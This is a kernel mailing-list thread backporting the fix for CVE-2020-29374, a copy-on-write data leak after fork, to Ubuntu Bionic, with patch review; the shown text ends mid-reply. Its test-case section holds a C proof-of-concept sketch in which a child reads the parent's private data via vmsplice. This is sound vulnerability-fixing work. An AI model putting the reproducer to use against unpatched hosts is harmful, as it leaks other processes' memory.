[SRU Bionic 0/1] CVE-2020-29374


Thadeu Lima de Souza Cascardo-3
[Impact]
A child process can read CoW data from a parent. This is the first part of the
writeup at https://bugs.chromium.org/p/project-zero/issues/detail?id=2045.

[Test case]
The code from the Project Zero writeup was used for testing. It was adapted so that
the shared data is read in the child before get_user_pages_fast is called, so that
the fast path is taken and the s390x fast path could be tested as well.
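
(For illustration only: a rough userspace sketch of the pattern being tested. This
is not the actual Project Zero reproducer; the sleep()-based ordering and the use
of vmsplice() as the GUP user, which takes read-only GUP references on the spliced
page, are simplifying assumptions.)

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
        /* One private anonymous page; after fork() it is shared CoW. */
        char *page = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        struct iovec iov = { .iov_base = page, .iov_len = 4096 };
        int pipefd[2];

        strcpy(page, "boring data");
        pipe(pipefd);

        if (fork() == 0) {
                char buf[4096];
                char c;

                /* Read the shared page first so the PTE is populated and
                 * the GUP fast path can be exercised (the adaptation
                 * described above). */
                c = page[0];
                (void)c;

                /* vmsplice() takes read-only GUP references on the page. */
                vmsplice(pipefd[1], &iov, 1, 0);

                /* Drop the child's mapping so the parent's later write may
                 * reuse the old page instead of copying it. */
                madvise(page, 4096, MADV_DONTNEED);

                sleep(2);       /* crude ordering, good enough for a sketch */
                read(pipefd[0], buf, sizeof(buf));
                /* On kernels without this fix, this can show the parent's
                 * private write; with the fix, the forced COW break at GUP
                 * time keeps the child on its own copy. */
                printf("child read: %s\n", buf);
                _exit(0);
        }

        sleep(1);
        strcpy(page, "parent-private data");
        wait(NULL);
        return 0;
}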

[Backport]
There were conflicts that had to be fixed, and FOLL_PIN does not exist on Bionic.
Also, s390x is the only architecture we care about that still had its own
get_user_pages_fast (GUPF) implementation at 4.15, so it needed to carry a fix of
its own based on the generic one.
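
(For comparison, a sketch of the upstream helper from 17839856fd58, which gates the
forced break on FOLL_GET or FOLL_PIN; since 4.15 has no FOLL_PIN, the backport
below checks FOLL_GET only.)

static inline bool should_force_cow_break(struct vm_area_struct *vma,
                                          unsigned int flags)
{
        return is_cow_mapping(vma->vm_flags) &&
                (flags & (FOLL_GET | FOLL_PIN));
}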

[Potential regression]
This could break users of GUP and hugepages.

Linus Torvalds (1):
  gup: document and work around "COW can break either way" issue

 arch/s390/mm/gup.c                      |  9 ++++-
 drivers/gpu/drm/i915/i915_gem_userptr.c |  8 +++++
 mm/gup.c                                | 44 +++++++++++++++++++++----
 mm/huge_memory.c                        |  7 ++--
 4 files changed, 57 insertions(+), 11 deletions(-)

--
2.27.0


--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team

[SRU Bionic 1/1] gup: document and work around "COW can break either way" issue

Thadeu Lima de Souza Cascardo-3
From: Linus Torvalds <[hidden email]>

Doing a "get_user_pages()" on a copy-on-write page for reading can be
ambiguous: the page can be COW'ed at any time afterwards, and the
direction of a COW event isn't defined.

Yes, whoever writes to it will generally do the COW, but if the thread
that did the get_user_pages() unmapped the page before the write (and
that could happen due to memory pressure in addition to any outright
action), the writer could also just take over the old page instead.

End result: the get_user_pages() call might result in a page pointer
that is no longer associated with the original VM, and is associated
with - and controlled by - another VM having taken it over instead.

So when doing a get_user_pages() on a COW mapping, the only really safe
thing to do would be to break the COW when getting the page, even when
only getting it for reading.

At the same time, some users simply don't even care.

For example, the perf code wants to look up the page not because it
cares about the page, but because the code simply wants to look up the
physical address of the access for informational purposes, and doesn't
really care about races when a page might be unmapped and remapped
elsewhere.

This adds logic to force a COW event by setting FOLL_WRITE on any
copy-on-write mapping when FOLL_GET (or FOLL_PIN) is used to get a page
pointer as a result.

The current semantics end up being:

 - __get_user_pages_fast(): no change. If you don't ask for a write,
   you won't break COW. You'd better know what you're doing.

 - get_user_pages_fast(): the fast-case "look it up in the page tables
   without anything getting mmap_sem" now refuses to follow a read-only
   page, since it might need COW breaking.  Which happens in the slow
   path - the fast path doesn't know if the memory might be COW or not.

 - get_user_pages() (including the slow-path fallback for gup_fast()):
   for a COW mapping, turn on FOLL_WRITE for FOLL_GET/FOLL_PIN, with
   very similar semantics to FOLL_FORCE.

If it turns out that we want finer granularity (ie "only break COW when
it might actually matter" - things like the zero page are special and
don't need to be broken) we might need to push these semantics deeper
into the lookup fault path.  So if people care enough, it's possible
that we might end up adding a new internal FOLL_BREAK_COW flag to go
with the internal FOLL_COW flag we already have for tracking "I had a
COW".

Alternatively, if it turns out that different callers might want to
explicitly control the forced COW break behavior, we might even want to
make such a flag visible to the users of get_user_pages() instead of
using the above default semantics.

But for now, this is mostly commentary on the issue (this commit message
being a lot bigger than the patch, and that patch in turn is almost all
comments), with that minimal "enable COW breaking early" logic using the
existing FOLL_WRITE behavior.

[ It might be worth noting that we've always had this ambiguity, and it
  could arguably be seen as a user-space issue.

  You only get private COW mappings that could break either way in
  situations where user space is doing cooperative things (ie fork()
  before an execve() etc), but it _is_ surprising and very subtle, and
  fork() is supposed to give you independent address spaces.

  So let's treat this as a kernel issue and make the semantics of
  get_user_pages() easier to understand. Note that obviously a true
  shared mapping will still get a page that can change under us, so this
  does _not_ mean that get_user_pages() somehow returns any "stable"
  page ]

Reported-by: Jann Horn <[hidden email]>
Tested-by: Christoph Hellwig <[hidden email]>
Acked-by: Oleg Nesterov <[hidden email]>
Acked-by: Kirill Shutemov <[hidden email]>
Acked-by: Jan Kara <[hidden email]>
Cc: Andrea Arcangeli <[hidden email]>
Cc: Matthew Wilcox <[hidden email]>
Signed-off-by: Linus Torvalds <[hidden email]>
(backported from commit 17839856fd588f4ab6b789f482ed3ffd7c403e1f)
[cascardo: fixed conflict due to missing commit ad415db817964e96df824e8bb1a861527f8012b6]
[cascardo: fixed conflict due to missing commit b798bec4741bdd80224214fdd004c8e52698e425]
[cascardo: fixed minor conflict on __get_user_pages_fast comment]
[cascardo: fixup for absence of FOLL_PIN]
[cascardo: use write=1 on s390's get_user_pages_fast too]
CVE-2020-29374
Signed-off-by: Thadeu Lima de Souza Cascardo <[hidden email]>
---
 arch/s390/mm/gup.c                      |  9 ++++-
 drivers/gpu/drm/i915/i915_gem_userptr.c |  8 +++++
 mm/gup.c                                | 44 +++++++++++++++++++++----
 mm/huge_memory.c                        |  7 ++--
 4 files changed, 57 insertions(+), 11 deletions(-)

diff --git a/arch/s390/mm/gup.c b/arch/s390/mm/gup.c
index 9bce54eac0b0..713cf80a740e 100644
--- a/arch/s390/mm/gup.c
+++ b/arch/s390/mm/gup.c
@@ -283,9 +283,16 @@ int get_user_pages_fast(unsigned long start, int nr_pages, int write,
 {
  int nr, ret;
 
+ /*
+ * The FAST_GUP case requires FOLL_WRITE even for pure reads,
+ * because get_user_pages() may need to cause an early COW in
+ * order to avoid confusing the normal COW routines. So only
+ * targets that are already writable are safe to do by just
+ * looking at the page tables.
+ */
  might_sleep();
  start &= PAGE_MASK;
- nr = __get_user_pages_fast(start, nr_pages, write, pages);
+ nr = __get_user_pages_fast(start, nr_pages, 1, pages);
  if (nr == nr_pages)
  return nr;
 
diff --git a/drivers/gpu/drm/i915/i915_gem_userptr.c b/drivers/gpu/drm/i915/i915_gem_userptr.c
index f1bd66b5f006..d87beef8ceb3 100644
--- a/drivers/gpu/drm/i915/i915_gem_userptr.c
+++ b/drivers/gpu/drm/i915/i915_gem_userptr.c
@@ -640,6 +640,14 @@ static int i915_gem_userptr_get_pages(struct drm_i915_gem_object *obj)
       GFP_KERNEL |
       __GFP_NORETRY |
       __GFP_NOWARN);
+ /*
+ * Using __get_user_pages_fast() with a read-only
+ * access is questionable. A read-only page may be
+ * COW-broken, and then this might end up giving
+ * the wrong side of the COW..
+ *
+ * We may or may not care.
+ */
  if (pvec) /* defer to worker if malloc fails */
  pinned = __get_user_pages_fast(obj->userptr.ptr,
        num_pages,
diff --git a/mm/gup.c b/mm/gup.c
index 12b9626b1a9e..ebf4a3482dee 100644
--- a/mm/gup.c
+++ b/mm/gup.c
@@ -61,13 +61,22 @@ static int follow_pfn_pte(struct vm_area_struct *vma, unsigned long address,
 }
 
 /*
- * FOLL_FORCE can write to even unwritable pte's, but only
- * after we've gone through a COW cycle and they are dirty.
+ * FOLL_FORCE or a forced COW break can write even to unwritable pte's,
+ * but only after we've gone through a COW cycle and they are dirty.
  */
 static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
 {
- return pte_write(pte) ||
- ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
+ return pte_write(pte) || ((flags & FOLL_COW) && pte_dirty(pte));
+}
+
+/*
+ * A (separate) COW fault might break the page the other way and
+ * get_user_pages() would return the page from what is now the wrong
+ * VM. So we need to force a COW break at GUP time even for reads.
+ */
+static inline bool should_force_cow_break(struct vm_area_struct *vma, unsigned int flags)
+{
+ return is_cow_mapping(vma->vm_flags) && (flags & (FOLL_GET));
 }
 
 static struct page *follow_page_pte(struct vm_area_struct *vma,
@@ -694,12 +703,18 @@ static long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
  if (!vma || check_vma_flags(vma, gup_flags))
  return i ? : -EFAULT;
  if (is_vm_hugetlb_page(vma)) {
+ if (should_force_cow_break(vma, foll_flags))
+ foll_flags |= FOLL_WRITE;
  i = follow_hugetlb_page(mm, vma, pages, vmas,
  &start, &nr_pages, i,
- gup_flags, nonblocking);
+ foll_flags, nonblocking);
  continue;
  }
  }
+
+ if (should_force_cow_break(vma, foll_flags))
+ foll_flags |= FOLL_WRITE;
+
 retry:
  /*
  * If we have a pending SIGKILL, don't keep faulting pages and
@@ -1796,6 +1811,10 @@ bool gup_fast_permitted(unsigned long start, int nr_pages, int write)
 /*
  * Like get_user_pages_fast() except it's IRQ-safe in that it won't fall back to
  * the regular GUP. It will only return non-negative values.
+ *
+ * Careful, careful! COW breaking can go either way, so a non-write
+ * access can get ambiguous page results. If you call this function without
+ * 'write' set, you'd better be sure that you're ok with that ambiguity.
  */
 int __get_user_pages_fast(unsigned long start, int nr_pages, int write,
   struct page **pages)
@@ -1823,6 +1842,12 @@ int __get_user_pages_fast(unsigned long start, int nr_pages, int write,
  *
  * We do not adopt an rcu_read_lock(.) here as we also want to
  * block IPIs that come from THPs splitting.
+ *
+ * NOTE! We allow read-only gup_fast() here, but you'd better be
+ * careful about possible COW pages. You'll get _a_ COW page, but
+ * not necessarily the one you intended to get depending on what
+ * COW event happens after this. COW may break the page copy in a
+ * random direction.
  */
 
  if (gup_fast_permitted(start, nr_pages, write)) {
@@ -1868,9 +1893,16 @@ int get_user_pages_fast(unsigned long start, int nr_pages, int write,
  (void __user *)start, len)))
  return -EFAULT;
 
+ /*
+ * The FAST_GUP case requires FOLL_WRITE even for pure reads,
+ * because get_user_pages() may need to cause an early COW in
+ * order to avoid confusing the normal COW routines. So only
+ * targets that are already writable are safe to do by just
+ * looking at the page tables.
+ */
  if (gup_fast_permitted(start, nr_pages, write)) {
  local_irq_disable();
- gup_pgd_range(addr, end, write, pages, &nr);
+ gup_pgd_range(addr, end, 1, pages, &nr);
  local_irq_enable();
  ret = nr;
  }
diff --git a/mm/huge_memory.c b/mm/huge_memory.c
index b0a6ba0833e4..9f8fbb504d15 100644
--- a/mm/huge_memory.c
+++ b/mm/huge_memory.c
@@ -1425,13 +1425,12 @@ int do_huge_pmd_wp_page(struct vm_fault *vmf, pmd_t orig_pmd)
 }
 
 /*
- * FOLL_FORCE can write to even unwritable pmd's, but only
- * after we've gone through a COW cycle and they are dirty.
+ * FOLL_FORCE or a forced COW break can write even to unwritable pmd's,
+ * but only after we've gone through a COW cycle and they are dirty.
  */
 static inline bool can_follow_write_pmd(pmd_t pmd, unsigned int flags)
 {
- return pmd_write(pmd) ||
-       ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pmd_dirty(pmd));
+ return pmd_write(pmd) || ((flags & FOLL_COW) && pmd_dirty(pmd));
 }
 
 struct page *follow_trans_huge_pmd(struct vm_area_struct *vma,
--
2.27.0


--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team

ACK: [SRU Bionic 0/1] CVE-2020-29374

Stefan Bader-2
In reply to this post by Thadeu Lima de Souza Cascardo-3
On 17.12.20 02:25, Thadeu Lima de Souza Cascardo wrote:

> [Impact]
> A child process can read CoW data from a parent. This is the first part of the
> writeup at https://bugs.chromium.org/p/project-zero/issues/detail?id=2045.
>
> [Test case]
> The code at the Project Zero writeup was the one tested. It was adapted so the
> shared data was read at the child before doing get_user_pages_fast, so the fast
> path would be taken and the fast path on s390x could be tested.
>
> [Backport]
> There were conflicts that were fixed, and FOLL_PIN does not exist on bionic.
> Also, s390x is the only architecture that matters to us that still had its own
> GUPF implementation at 4.15. So, it needed to carry a fix of its own based on
> the generic one.
>
> [Potential regression]
> This could break users of GUP and hugepages.
>
> Linus Torvalds (1):
>   gup: document and work around "COW can break either way" issue
>
>  arch/s390/mm/gup.c                      |  9 ++++-
>  drivers/gpu/drm/i915/i915_gem_userptr.c |  8 +++++
>  mm/gup.c                                | 44 +++++++++++++++++++++----
>  mm/huge_memory.c                        |  7 ++--
>  4 files changed, 57 insertions(+), 11 deletions(-)
>
It appears to implement what is described, and given the area changed I would
expect the reproducer tests to uncover any issues. There is always risk when mm
code is touched, but this has to be fixed at some point.

Acked-by: Stefan Bader <[hidden email]>


--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team

Re: [SRU Bionic 1/1] gup: document and work around "COW can break either way" issue

William Breathitt Gray
In reply to this post by Thadeu Lima de Souza Cascardo-3
On Wed, Dec 16, 2020 at 10:25:57PM -0300, Thadeu Lima de Souza Cascardo wrote:

> From: Linus Torvalds <[hidden email]>
>
> Doing a "get_user_pages()" on a copy-on-write page for reading can be
> ambiguous: the page can be COW'ed at any time afterwards, and the
> direction of a COW event isn't defined.
>
> Yes, whoever writes to it will generally do the COW, but if the thread
> that did the get_user_pages() unmapped the page before the write (and
> that could happen due to memory pressure in addition to any outright
> action), the writer could also just take over the old page instead.
>
> End result: the get_user_pages() call might result in a page pointer
> that is no longer associated with the original VM, and is associated
> with - and controlled by - another VM having taken it over instead.
>
> So when doing a get_user_pages() on a COW mapping, the only really safe
> thing to do would be to break the COW when getting the page, even when
> only getting it for reading.
>
> At the same time, some users simply don't even care.
>
> For example, the perf code wants to look up the page not because it
> cares about the page, but because the code simply wants to look up the
> physical address of the access for informational purposes, and doesn't
> really care about races when a page might be unmapped and remapped
> elsewhere.
>
> This adds logic to force a COW event by setting FOLL_WRITE on any
> copy-on-write mapping when FOLL_GET (or FOLL_PIN) is used to get a page
> pointer as a result.
>
> The current semantics end up being:
>
>  - __get_user_pages_fast(): no change. If you don't ask for a write,
>    you won't break COW. You'd better know what you're doing.
>
>  - get_user_pages_fast(): the fast-case "look it up in the page tables
>    without anything getting mmap_sem" now refuses to follow a read-only
>    page, since it might need COW breaking.  Which happens in the slow
>    path - the fast path doesn't know if the memory might be COW or not.
>
>  - get_user_pages() (including the slow-path fallback for gup_fast()):
>    for a COW mapping, turn on FOLL_WRITE for FOLL_GET/FOLL_PIN, with
>    very similar semantics to FOLL_FORCE.
>
> If it turns out that we want finer granularity (ie "only break COW when
> it might actually matter" - things like the zero page are special and
> don't need to be broken) we might need to push these semantics deeper
> into the lookup fault path.  So if people care enough, it's possible
> that we might end up adding a new internal FOLL_BREAK_COW flag to go
> with the internal FOLL_COW flag we already have for tracking "I had a
> COW".
>
> Alternatively, if it turns out that different callers might want to
> explicitly control the forced COW break behavior, we might even want to
> make such a flag visible to the users of get_user_pages() instead of
> using the above default semantics.
>
> But for now, this is mostly commentary on the issue (this commit message
> being a lot bigger than the patch, and that patch in turn is almost all
> comments), with that minimal "enable COW breaking early" logic using the
> existing FOLL_WRITE behavior.
>
> [ It might be worth noting that we've always had this ambiguity, and it
>   could arguably be seen as a user-space issue.
>
>   You only get private COW mappings that could break either way in
>   situations where user space is doing cooperative things (ie fork()
>   before an execve() etc), but it _is_ surprising and very subtle, and
>   fork() is supposed to give you independent address spaces.
>
>   So let's treat this as a kernel issue and make the semantics of
>   get_user_pages() easier to understand. Note that obviously a true
>   shared mapping will still get a page that can change under us, so this
>   does _not_ mean that get_user_pages() somehow returns any "stable"
>   page ]
>
> Reported-by: Jann Horn <[hidden email]>
> Tested-by: Christoph Hellwig <[hidden email]>
> Acked-by: Oleg Nesterov <[hidden email]>
> Acked-by: Kirill Shutemov <[hidden email]>
> Acked-by: Jan Kara <[hidden email]>
> Cc: Andrea Arcangeli <[hidden email]>
> Cc: Matthew Wilcox <[hidden email]>
> Signed-off-by: Linus Torvalds <[hidden email]>
> (backported from commit 17839856fd588f4ab6b789f482ed3ffd7c403e1f)
> [cascardo: fixed conflict due to missing commit ad415db817964e96df824e8bb1a861527f8012b6]
> [cascardo: fixed conflict due to missing commit b798bec4741bdd80224214fdd004c8e52698e425]
> [cascardo: fixed minor conflict on __get_user_pages_fast comment]
> [cascardo: fixup for absence of FOLL_PIN]
> [cascardo: use write=1 on s390's get_user_pages_fast too]
> CVE-2020-29374
> Signed-off-by: Thadeu Lima de Souza Cascardo <[hidden email]>
> ---
>  arch/s390/mm/gup.c                      |  9 ++++-
>  drivers/gpu/drm/i915/i915_gem_userptr.c |  8 +++++
>  mm/gup.c                                | 44 +++++++++++++++++++++----
>  mm/huge_memory.c                        |  7 ++--
>  4 files changed, 57 insertions(+), 11 deletions(-)
>
> diff --git a/arch/s390/mm/gup.c b/arch/s390/mm/gup.c
> index 9bce54eac0b0..713cf80a740e 100644
> --- a/arch/s390/mm/gup.c
> +++ b/arch/s390/mm/gup.c
> @@ -283,9 +283,16 @@ int get_user_pages_fast(unsigned long start, int nr_pages, int write,
>  {
>   int nr, ret;
>  
> + /*
> + * The FAST_GUP case requires FOLL_WRITE even for pure reads,
> + * because get_user_pages() may need to cause an early COW in
> + * order to avoid confusing the normal COW routines. So only
> + * targets that are already writable are safe to do by just
> + * looking at the page tables.
> + */
>   might_sleep();
>   start &= PAGE_MASK;
> - nr = __get_user_pages_fast(start, nr_pages, write, pages);
> + nr = __get_user_pages_fast(start, nr_pages, 1, pages);
>   if (nr == nr_pages)
>   return nr;
>  
> diff --git a/drivers/gpu/drm/i915/i915_gem_userptr.c b/drivers/gpu/drm/i915/i915_gem_userptr.c
> index f1bd66b5f006..d87beef8ceb3 100644
> --- a/drivers/gpu/drm/i915/i915_gem_userptr.c
> +++ b/drivers/gpu/drm/i915/i915_gem_userptr.c
> @@ -640,6 +640,14 @@ static int i915_gem_userptr_get_pages(struct drm_i915_gem_object *obj)
>        GFP_KERNEL |
>        __GFP_NORETRY |
>        __GFP_NOWARN);
> + /*
> + * Using __get_user_pages_fast() with a read-only
> + * access is questionable. A read-only page may be
> + * COW-broken, and then this might end up giving
> + * the wrong side of the COW..
> + *
> + * We may or may not care.
> + */
>   if (pvec) /* defer to worker if malloc fails */
>   pinned = __get_user_pages_fast(obj->userptr.ptr,
>         num_pages,
> diff --git a/mm/gup.c b/mm/gup.c
> index 12b9626b1a9e..ebf4a3482dee 100644
> --- a/mm/gup.c
> +++ b/mm/gup.c
> @@ -61,13 +61,22 @@ static int follow_pfn_pte(struct vm_area_struct *vma, unsigned long address,
>  }
>  
>  /*
> - * FOLL_FORCE can write to even unwritable pte's, but only
> - * after we've gone through a COW cycle and they are dirty.
> + * FOLL_FORCE or a forced COW break can write even to unwritable pte's,
> + * but only after we've gone through a COW cycle and they are dirty.
>   */
>  static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
>  {
> - return pte_write(pte) ||
> - ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
> + return pte_write(pte) || ((flags & FOLL_COW) && pte_dirty(pte));
> +}
> +
> +/*
> + * A (separate) COW fault might break the page the other way and
> + * get_user_pages() would return the page from what is now the wrong
> + * VM. So we need to force a COW break at GUP time even for reads.
> + */
> +static inline bool should_force_cow_break(struct vm_area_struct *vma, unsigned int flags)
> +{
> + return is_cow_mapping(vma->vm_flags) && (flags & (FOLL_GET));
>  }
>  
>  static struct page *follow_page_pte(struct vm_area_struct *vma,
> @@ -694,12 +703,18 @@ static long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
>   if (!vma || check_vma_flags(vma, gup_flags))
>   return i ? : -EFAULT;
>   if (is_vm_hugetlb_page(vma)) {
> + if (should_force_cow_break(vma, foll_flags))
> + foll_flags |= FOLL_WRITE;
>   i = follow_hugetlb_page(mm, vma, pages, vmas,
>   &start, &nr_pages, i,
> - gup_flags, nonblocking);
> + foll_flags, nonblocking);
>   continue;
>   }
>   }
> +
> + if (should_force_cow_break(vma, foll_flags))
> + foll_flags |= FOLL_WRITE;
> +
>  retry:
>   /*
>   * If we have a pending SIGKILL, don't keep faulting pages and
> @@ -1796,6 +1811,10 @@ bool gup_fast_permitted(unsigned long start, int nr_pages, int write)
>  /*
>   * Like get_user_pages_fast() except it's IRQ-safe in that it won't fall back to
>   * the regular GUP. It will only return non-negative values.
> + *
> + * Careful, careful! COW breaking can go either way, so a non-write
> + * access can get ambiguous page results. If you call this function without
> + * 'write' set, you'd better be sure that you're ok with that ambiguity.
>   */
>  int __get_user_pages_fast(unsigned long start, int nr_pages, int write,
>    struct page **pages)
> @@ -1823,6 +1842,12 @@ int __get_user_pages_fast(unsigned long start, int nr_pages, int write,
>   *
>   * We do not adopt an rcu_read_lock(.) here as we also want to
>   * block IPIs that come from THPs splitting.
> + *
> + * NOTE! We allow read-only gup_fast() here, but you'd better be
> + * careful about possible COW pages. You'll get _a_ COW page, but
> + * not necessarily the one you intended to get depending on what
> + * COW event happens after this. COW may break the page copy in a
> + * random direction.
>   */
>  
>   if (gup_fast_permitted(start, nr_pages, write)) {
> @@ -1868,9 +1893,16 @@ int get_user_pages_fast(unsigned long start, int nr_pages, int write,
>   (void __user *)start, len)))
>   return -EFAULT;
>  
> + /*
> + * The FAST_GUP case requires FOLL_WRITE even for pure reads,
> + * because get_user_pages() may need to cause an early COW in
> + * order to avoid confusing the normal COW routines. So only
> + * targets that are already writable are safe to do by just
> + * looking at the page tables.
> + */
>   if (gup_fast_permitted(start, nr_pages, write)) {
>   local_irq_disable();
> - gup_pgd_range(addr, end, write, pages, &nr);
> + gup_pgd_range(addr, end, 1, pages, &nr);
>   local_irq_enable();
>   ret = nr;
>   }
> diff --git a/mm/huge_memory.c b/mm/huge_memory.c
> index b0a6ba0833e4..9f8fbb504d15 100644
> --- a/mm/huge_memory.c
> +++ b/mm/huge_memory.c
> @@ -1425,13 +1425,12 @@ int do_huge_pmd_wp_page(struct vm_fault *vmf, pmd_t orig_pmd)
>  }
>  
>  /*
> - * FOLL_FORCE can write to even unwritable pmd's, but only
> - * after we've gone through a COW cycle and they are dirty.
> + * FOLL_FORCE or a forced COW break can write even to unwritable pmd's,
> + * but only after we've gone through a COW cycle and they are dirty.
>   */
>  static inline bool can_follow_write_pmd(pmd_t pmd, unsigned int flags)
>  {
> - return pmd_write(pmd) ||
> -       ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pmd_dirty(pmd));
> + return pmd_write(pmd) || ((flags & FOLL_COW) && pmd_dirty(pmd));
The comment above this function mentions FOLL_FORCE, but I see it
removed here. Is that removal intentional?

William Breathitt Gray

>  }
>  
>  struct page *follow_trans_huge_pmd(struct vm_area_struct *vma,
> --
> 2.27.0
>
>
> --
> kernel-team mailing list
> [hidden email]
> https://lists.ubuntu.com/mailman/listinfo/kernel-team

--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team

Re: [SRU Bionic 1/1] gup: document and work around "COW can break either way" issue

Thadeu Lima de Souza Cascardo-3
On Wed, Jan 13, 2021 at 05:54:06AM -0500, William Breathitt Gray wrote:

> On Wed, Dec 16, 2020 at 10:25:57PM -0300, Thadeu Lima de Souza Cascardo wrote:
> > From: Linus Torvalds <[hidden email]>
> >
> > Doing a "get_user_pages()" on a copy-on-write page for reading can be
> > ambiguous: the page can be COW'ed at any time afterwards, and the
> > direction of a COW event isn't defined.
> >
> > Yes, whoever writes to it will generally do the COW, but if the thread
> > that did the get_user_pages() unmapped the page before the write (and
> > that could happen due to memory pressure in addition to any outright
> > action), the writer could also just take over the old page instead.
> >
> > End result: the get_user_pages() call might result in a page pointer
> > that is no longer associated with the original VM, and is associated
> > with - and controlled by - another VM having taken it over instead.
> >
> > So when doing a get_user_pages() on a COW mapping, the only really safe
> > thing to do would be to break the COW when getting the page, even when
> > only getting it for reading.
> >
> > At the same time, some users simply don't even care.
> >
> > For example, the perf code wants to look up the page not because it
> > cares about the page, but because the code simply wants to look up the
> > physical address of the access for informational purposes, and doesn't
> > really care about races when a page might be unmapped and remapped
> > elsewhere.
> >
> > This adds logic to force a COW event by setting FOLL_WRITE on any
> > copy-on-write mapping when FOLL_GET (or FOLL_PIN) is used to get a page
> > pointer as a result.
> >
> > The current semantics end up being:
> >
> >  - __get_user_pages_fast(): no change. If you don't ask for a write,
> >    you won't break COW. You'd better know what you're doing.
> >
> >  - get_user_pages_fast(): the fast-case "look it up in the page tables
> >    without anything getting mmap_sem" now refuses to follow a read-only
> >    page, since it might need COW breaking.  Which happens in the slow
> >    path - the fast path doesn't know if the memory might be COW or not.
> >
> >  - get_user_pages() (including the slow-path fallback for gup_fast()):
> >    for a COW mapping, turn on FOLL_WRITE for FOLL_GET/FOLL_PIN, with
> >    very similar semantics to FOLL_FORCE.
> >
> > If it turns out that we want finer granularity (ie "only break COW when
> > it might actually matter" - things like the zero page are special and
> > don't need to be broken) we might need to push these semantics deeper
> > into the lookup fault path.  So if people care enough, it's possible
> > that we might end up adding a new internal FOLL_BREAK_COW flag to go
> > with the internal FOLL_COW flag we already have for tracking "I had a
> > COW".
> >
> > Alternatively, if it turns out that different callers might want to
> > explicitly control the forced COW break behavior, we might even want to
> > make such a flag visible to the users of get_user_pages() instead of
> > using the above default semantics.
> >
> > But for now, this is mostly commentary on the issue (this commit message
> > being a lot bigger than the patch, and that patch in turn is almost all
> > comments), with that minimal "enable COW breaking early" logic using the
> > existing FOLL_WRITE behavior.
> >
> > [ It might be worth noting that we've always had this ambiguity, and it
> >   could arguably be seen as a user-space issue.
> >
> >   You only get private COW mappings that could break either way in
> >   situations where user space is doing cooperative things (ie fork()
> >   before an execve() etc), but it _is_ surprising and very subtle, and
> >   fork() is supposed to give you independent address spaces.
> >
> >   So let's treat this as a kernel issue and make the semantics of
> >   get_user_pages() easier to understand. Note that obviously a true
> >   shared mapping will still get a page that can change under us, so this
> >   does _not_ mean that get_user_pages() somehow returns any "stable"
> >   page ]
> >
> > Reported-by: Jann Horn <[hidden email]>
> > Tested-by: Christoph Hellwig <[hidden email]>
> > Acked-by: Oleg Nesterov <[hidden email]>
> > Acked-by: Kirill Shutemov <[hidden email]>
> > Acked-by: Jan Kara <[hidden email]>
> > Cc: Andrea Arcangeli <[hidden email]>
> > Cc: Matthew Wilcox <[hidden email]>
> > Signed-off-by: Linus Torvalds <[hidden email]>
> > (backported from commit 17839856fd588f4ab6b789f482ed3ffd7c403e1f)
> > [cascardo: fixed conflict due to missing commit ad415db817964e96df824e8bb1a861527f8012b6]
> > [cascardo: fixed conflict due to missing commit b798bec4741bdd80224214fdd004c8e52698e425]
> > [cascardo: fixed minor conflict on __get_user_pages_fast comment]
> > [cascardo: fixup for absence of FOLL_PIN]
> > [cascardo: use write=1 on s390's get_user_pages_fast too]
> > CVE-2020-29374
> > Signed-off-by: Thadeu Lima de Souza Cascardo <[hidden email]>
> > ---
> >  arch/s390/mm/gup.c                      |  9 ++++-
> >  drivers/gpu/drm/i915/i915_gem_userptr.c |  8 +++++
> >  mm/gup.c                                | 44 +++++++++++++++++++++----
> >  mm/huge_memory.c                        |  7 ++--
> >  4 files changed, 57 insertions(+), 11 deletions(-)
> >
> > diff --git a/arch/s390/mm/gup.c b/arch/s390/mm/gup.c
> > index 9bce54eac0b0..713cf80a740e 100644
> > --- a/arch/s390/mm/gup.c
> > +++ b/arch/s390/mm/gup.c
> > @@ -283,9 +283,16 @@ int get_user_pages_fast(unsigned long start, int nr_pages, int write,
> >  {
> >   int nr, ret;
> >  
> > + /*
> > + * The FAST_GUP case requires FOLL_WRITE even for pure reads,
> > + * because get_user_pages() may need to cause an early COW in
> > + * order to avoid confusing the normal COW routines. So only
> > + * targets that are already writable are safe to do by just
> > + * looking at the page tables.
> > + */
> >   might_sleep();
> >   start &= PAGE_MASK;
> > - nr = __get_user_pages_fast(start, nr_pages, write, pages);
> > + nr = __get_user_pages_fast(start, nr_pages, 1, pages);
> >   if (nr == nr_pages)
> >   return nr;
> >  
> > diff --git a/drivers/gpu/drm/i915/i915_gem_userptr.c b/drivers/gpu/drm/i915/i915_gem_userptr.c
> > index f1bd66b5f006..d87beef8ceb3 100644
> > --- a/drivers/gpu/drm/i915/i915_gem_userptr.c
> > +++ b/drivers/gpu/drm/i915/i915_gem_userptr.c
> > @@ -640,6 +640,14 @@ static int i915_gem_userptr_get_pages(struct drm_i915_gem_object *obj)
> >        GFP_KERNEL |
> >        __GFP_NORETRY |
> >        __GFP_NOWARN);
> > + /*
> > + * Using __get_user_pages_fast() with a read-only
> > + * access is questionable. A read-only page may be
> > + * COW-broken, and then this might end up giving
> > + * the wrong side of the COW..
> > + *
> > + * We may or may not care.
> > + */
> >   if (pvec) /* defer to worker if malloc fails */
> >   pinned = __get_user_pages_fast(obj->userptr.ptr,
> >         num_pages,
> > diff --git a/mm/gup.c b/mm/gup.c
> > index 12b9626b1a9e..ebf4a3482dee 100644
> > --- a/mm/gup.c
> > +++ b/mm/gup.c
